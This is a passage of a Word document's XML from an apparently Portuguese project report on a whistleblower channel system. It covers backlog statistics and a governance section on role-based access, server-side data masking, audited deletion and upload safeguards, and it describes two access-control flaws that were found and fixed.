        <w:t xml:space="preserve">47,2 % do volume vem de São Paulo e Rio de Janeiro. Distribuição uniforme de atendentes por estado significa fila em SP e ociosidade em PR.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">8. Nunca exibir média sozinha.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Com coeficiente de variação de 73,92 %, a média isolada é enganosa. O painel de gestão deve sempre mostrar</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">mediana e percentil 90 ao lado da média</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, o que já está implementado nos cartões do relatório. É uma decisão de produto que decorre diretamente do dado e da recomendação de tratar métricas como distribuições (GOOGLE, 2016): quando a dispersão é grande, exibir só a média é escolher informar mal.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="106"/>
    <w:bookmarkStart w:id="107" w:name="resumo-executivo-da-análise"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">4.3.2 Resumo executivo da análise</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BlockText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">O canal atende bem os casos que consegue fechar:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">mediana de 4,59 dias</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, com a triagem por gravidade funcionando de forma consistente (violência em 2,57 dias contra 11,16 de</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">“</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">outros</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">”</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">) e a classificação automática do VigIA validada empiricamente pelo tempo real de atendimento.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BlockText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">O problema não está no que ele conclui, está no que ele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conclui. Há</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">49 casos abertos com espera média de 69,90 dias</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, e entre eles a urgência CRÍTICA é a que mais espera, com 78,84 dias e um caso parado há mais de quatro meses. A média de 5,47 dias descreve com precisão uma realidade que exclui exatamente onde o sistema falha.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BlockText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">A prioridade um não é acelerar o atendimento. É</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">enxergar o backlog</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: alerta de envelhecimento por urgência, e SLA definido pelo percentil 90 em vez da média.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="107"/>
    <w:bookmarkEnd w:id="108"/>
    <w:bookmarkEnd w:id="109"/>
    <w:bookmarkStart w:id="130" w:name="parte-5-governança-e-auditoria"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">PARTE 5: Governança e Auditoria</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BlockText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">O que o enunciado pede</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BlockText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">(a)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Apresente como o sistema controla o acesso, protege dados sensíveis e registra ações relevantes do sistema.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(b)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Elabore uma tabela indicando os perfis de usuário, suas permissões e quais funcionalidades acessam dados pessoais.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(c)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Defina quais operações precisam gerar trilhas de auditoria, como alteração de status, consulta sensível, exportação de dados ou exclusão de registros.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(d)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Explique a diferença entre logs técnicos e registros de auditoria no contexto do projeto.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(e)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Descreva quais medidas foram adotadas para reduzir riscos na exposição de dados por API.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Cada um dos cinco itens tem uma seção própria: 5.2 responde ao item (a), 5.3 ao (b), 5.4 ao (c), 5.5 ao (d) e 5.6 ao (e). A seção 5.1 estabelece o princípio que organiza todas elas, a 5.7 registra o fundamento legal e a 5.8 declara o que ainda não está resolvido.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">As quatro operações citadas nominalmente pelo enunciado (alteração de status, consulta sensível, exportação de dados e exclusão de registros) estão todas na trilha, e a seção 5.4.1 as identifica pelas ações</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">ALTERACAO_STATUS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CONSULTA_SENSIVEL</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">EXPORTACAO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EXCLUSAO</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, ao lado das outras sete.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:pict>
          <v:rect style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:bookmarkStart w:id="110" w:name="o-princípio-que-organiza-tudo"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">5.1 O princípio que organiza tudo</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Um canal de denúncias guarda a informação mais perigosa que um cidadão pode entregar ao Estado: quem ele é e do que está acusando alguém. Vazar isso não gera prejuízo financeiro, gera retaliação. O ponto não é retórico: o regime europeu de proteção a denunciantes nasceu do reconhecimento de que o receio de represália desencoraja a denúncia (UNIÃO EUROPEIA, 2019), e a Transparência Internacional documenta que a retaliação persiste mesmo onde há proteção legal, na forma de demissão, rebaixamento, assédio e ataque à reputação (TRANSPARENCY INTERNATIONAL, 2026).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">O custo de errar aqui também é mensurável em outra moeda. O relatório anual da IBM sobre o custo de violações de dados aponta média global próxima de</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">USD 5 milhões</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">por incidente e tempo médio de</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">247 dias</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">para identificar e conter uma violação (IBM, 2026). Num canal de denúncias, esse tempo é a diferença entre um vazamento contido e um endereço de vítima circulando por oito meses.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Por isso o desenho de acesso deste sistema parte de uma pergunta invertida. Em vez de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o que este perfil precisa poder fazer?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:iCs/>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">”</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, a pergunta é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qual é o mínimo que ele precisa ver para fazer o trabalho dele?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">”</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. É o princípio da necessidade, que a LGPD define como a</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">“</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">limitação do tratamento ao mínimo necessário para a realização de suas finalidades, com abrangência dos dados pertinentes, proporcionais e não excessivos</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">”</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">(BRASIL, 2018a, art. 6.º, III), e que aqui tem uma consequência arquitetural direta:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">o mascaramento acontece no servidor, não na interface</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">A diferença não é acadêmica. Esconder um campo com CSS deixa o dado no JSON que o navegador já recebeu, e qualquer pessoa com o console aberto o lê. Quando o servidor não envia, não há o que revelar.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:pict>
          <v:rect style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="110"/>
    <w:bookmarkStart w:id="114" w:name="Xe6204a2146c38ede0e9384533f10375d293813d"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">5.2 Requisito (a): controle de acesso, proteção do dado e registro</w:t>
      </w:r>
    </w:p>
    <w:bookmarkStart w:id="111" w:name="controle-de-acesso"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">5.2.1 Controle de acesso</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Cinco perfis. O enum</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">PerfilUsuario</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">carrega as duas capacidades que definem cada um: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PerfilUsuario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CIDADAO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registra e consulta o proprio protocolo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ATENDENTE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trata os casos; NAO ve identificacao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GESTOR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coordena; ve identificacao, NAO ve auditoria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AUDITOR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fiscaliza o uso; NAO le o relato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ADMIN</w:t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acesso pleno, integralmente auditado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controle de acesso é a primeira medida técnica recomendada pela ANPD no guia de segurança da informação, que o define como a medida</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">“</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">para garantir que os dados sejam acessados somente por pessoas autorizadas</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">”</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">(ANPD, 2021). A restrição é aplicada em</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">três camadas</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, e o front-end não é nenhuma delas.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Por rota</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, no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"/api/auditoria/**"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PerfilUsuario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AUDITOR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PerfilUsuario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"/api/denuncias/**"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PerfilUsuario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PerfilUsuario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requestMatchers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"/api/exportacao/**"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hasAnyRole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PerfilUsuario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ATENDENTE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PerfilUsuario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GESTOR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PerfilUsuario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ADMIN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authenticated</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">()</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Por campo</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, no mapeamento da resposta. Um ATENDENTE recebe</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">"[endereco protegido]"</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">em vez do endereço real, porque o servidor substitui o valor antes de serializar.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Por perfil declarado no token.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Aqui estava a falha mais grave encontrada nesta fase. O</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">JwtAuthFilter</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">concedia</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">ROLE_GESTOR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qualquer token válido</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, ignorando o perfil que o próprio token declarava. Na prática, autenticar como atendente dava poderes de gestor, e todo o RBAC descrito na documentação era decorativo. É a descrição literal do risco</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">API5:2023 Broken Function Level Authorization</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">(OWASP, 2023). Corrigido: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perfilNoToken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jwtService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extrairPerfil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perfilNoToken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PerfilUsuario perfil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PerfilUsuario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perfilNoToken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UsernamePasswordAuthenticationToken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SimpleGrantedAuthority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"ROLE_"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perfil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O método</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">de()</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">cai no perfil de</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">menor</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">privilégio quando o valor é desconhecido: erra para o lado de negar acesso, nunca para o de conceder. Dois testes fixam esse comportamento. A validação do token segue as boas práticas atuais de JWT, que exigem verificação explícita do algoritmo de assinatura e proíbem aceitar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por omissão (IETF, 2020).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">E a segunda falha, encontrada na verificação final:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">a tela de login não falava com a API</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Era uma comparação de texto dentro do JavaScript que o cidadão baixa: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(user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pass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'admin123'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'dashboard'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 sistema afirmava usar Spring Security, JWT e BCrypt, e usava em todo o resto, mas a porta da frente era uma credencial escrita no código-fonte público. Hoje a senha vai ao servidor, é conferida contra o hash BCrypt, e</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">o perfil aplicado é o que o token assinado declara</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, não o que o usuário digitou. O usuário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da comparação fixa deixou de existir: as contas são criadas pelo</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">CommandLineRunner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, identificadas por e-mail e com a senha gravada em hash.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">As duas falhas têm a mesma natureza e vale nomeá-la:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">cada camada estava correta isoladamente</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. O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declarava as regras certas, o</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">JwtService</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">assinava o perfil certo no token, os testes de cada peça passavam. O defeito morava na costura entre elas, que é exatamente onde teste unitário não olha.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">A demonstração de que a restrição é real.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">O painel mantém a aba de Trilha de Auditoria</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">visível</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">para perfis que não podem acessá-la. Não é descuido. Esconder o botão pareceria segurança sem sê-la, porque o botão escondido continuaria alcançável pelo console. Ao clicar, o perfil ATENDENTE recebe:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">Acesso negado. Esta tentativa foi registrada na propria trilha de auditoria.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">A recusa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a demonstração. E ela própria vira registro, que um AUDITOR encontra depois. Verificado contra a aplicação em execução:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">GET /api/auditoria</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">devolve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para ATENDENTE e para GESTOR, e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para AUDITOR e ADMIN.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="111"/>
    <w:bookmarkStart w:id="112" w:name="proteção-do-dado-sensível"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">5.2.2 Proteção do dado sensível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2178"/>
        <w:gridCol w:w="2244"/>
        <w:gridCol w:w="191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resolve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 que a sustenta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Senha em</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:bCs/>
                <w:b/>
              </w:rPr>
              <w:t xml:space="preserve">BCrypt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texto puro nunca é persistido. O CHECK do banco exige 55 caracteres ou mais no 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[s.d.]a; PROVOS; MAZIÈRES, 1999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Anonimato estrutural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  <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">ck_denuncia_anonimato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Denúncia anônima não pode ter denunciante vinculado, e a regra é imposta pelo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BRASIL, 2018c, art. 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Mascaramento por perfil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MascaraUtil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DenunciaMapper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endereço da ocorrência é reduzido</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:bCs/>
                <w:b/>
              </w:rPr>
              <w:t xml:space="preserve">no servidor</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">, conforme quem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BRASIL, 2018a, art. 6.º,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DTO por audiência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DTOs de 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listagem não trafega relato nem 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2023 (API3)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Exclusão lógica com anonimização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DenunciaService.excluir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Detalhada abaixo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BRASIL, 2018a, art. 18, VI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k-anonimato no mapa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mapa-gestor.js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Município com menos de 3 denúncias fica em cinza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SWEENEY, 2002; ROCHER et al.,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CORS por lista de origens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site de terceiros dispara requisição autenticada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[s.d.]d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Limite por origem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RateLimitFilter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denúncias por minuto e 20 logins por minuto por IP, com</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:bCs/>
                <w:b/>
              </w:rPr>
              <w:t xml:space="preserve">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2023 (API4)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Contexto da IA sem relato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VigiaService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pergunta livre do gestor não envia relatos ao Gemini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BRASIL, 2018a, art. 6.º, III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Tipo de arquivo pela assinatura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AssinaturaArquivo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número mágico está no conteúdo, e não no rótulo escolhido por quem envia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[s.d.]c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Nome de arquivo gerado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nome do usuário nunca chega ao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[s.d.]c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Binário fora da pasta pública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app.evidencias.dir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no diretório servido é arquivo que se baixa adivinhando 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[s.d.]c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Hash conferido na leitura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EvidenciaService.conteudo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trocado no disco tem o download recusado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[s.d.]b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CSV sem fórmula executável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ExportacaoService.campo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iniciado por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-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</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">ou tabulação é prefixado com apóstrofo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OWASP, [s.d.]f</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">A exclusão que não apaga.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excluir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motivo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motivo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motivo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RegraDeNegocioException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 exclusao exige um motivo registrado"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setExcluida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setMotivoExclusao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motivo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setExcluidaEm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setDescricao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o conteudo sensivel some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setEndereco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setResumoIa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Aqui há uma tensão real entre dois deveres legítimos. A LGPD dá ao titular o direito de eliminação dos dados tratados com consentimento (BRASIL, 2018a, art. 18, VI). A administração pública tem dever de</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">rastreabilidade</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, porque um órgão não pode fazer registros desaparecerem sem deixar vestígio, sob pena de a exclusão virar ferramenta de encobrimento. O Decreto 10.153/2019 mostra como o Estado brasileiro resolve o conflito no caso de denúncias: os elementos de identificação são preservados desde o recebimento, a restrição de acesso a eles é mantida por cem anos, e a ouvidoria</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">pseudonimiza</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">a denúncia antes de encaminhá-la (BRASIL, 2019, art. 6.º). Preserva-se o registro e destrói-se a ligação com a pessoa.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">A solução adotada aqui segue a mesma lógica: o</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">conteúdo sensível é destruído</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">(relato, endereço e resumo da IA passam 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), enquanto</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">a existência do registro permanece</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, com motivo e data. O que resta é uma carcaça auditável: sabe-se que houve um caso, quando foi excluído e por quê, sem que reste nada do que a vítima escreveu.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">E a restrição é do banco, não só da aplicação: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ck_denuncia_exclusao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excluida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(motivo_exclusao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excluida_em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descricao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endereco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Nenhum caminho, nem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manual no SQL Developer, consegue marcar uma denúncia como excluída deixando o relato para trás.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">O arquivo enviado pelo cidadão.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Upload é a superfície mais atacada de qualquer sistema público, porque é o único ponto em que um estranho escreve</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">conteúdo binário</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">no servidor. Quatro decisões governam esse caminho, e as quatro são exatamente as que a OWASP prescreve (OWASP, [s.d.]c).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:iCs/>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">O tipo vem do conteúdo, não do rótulo.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
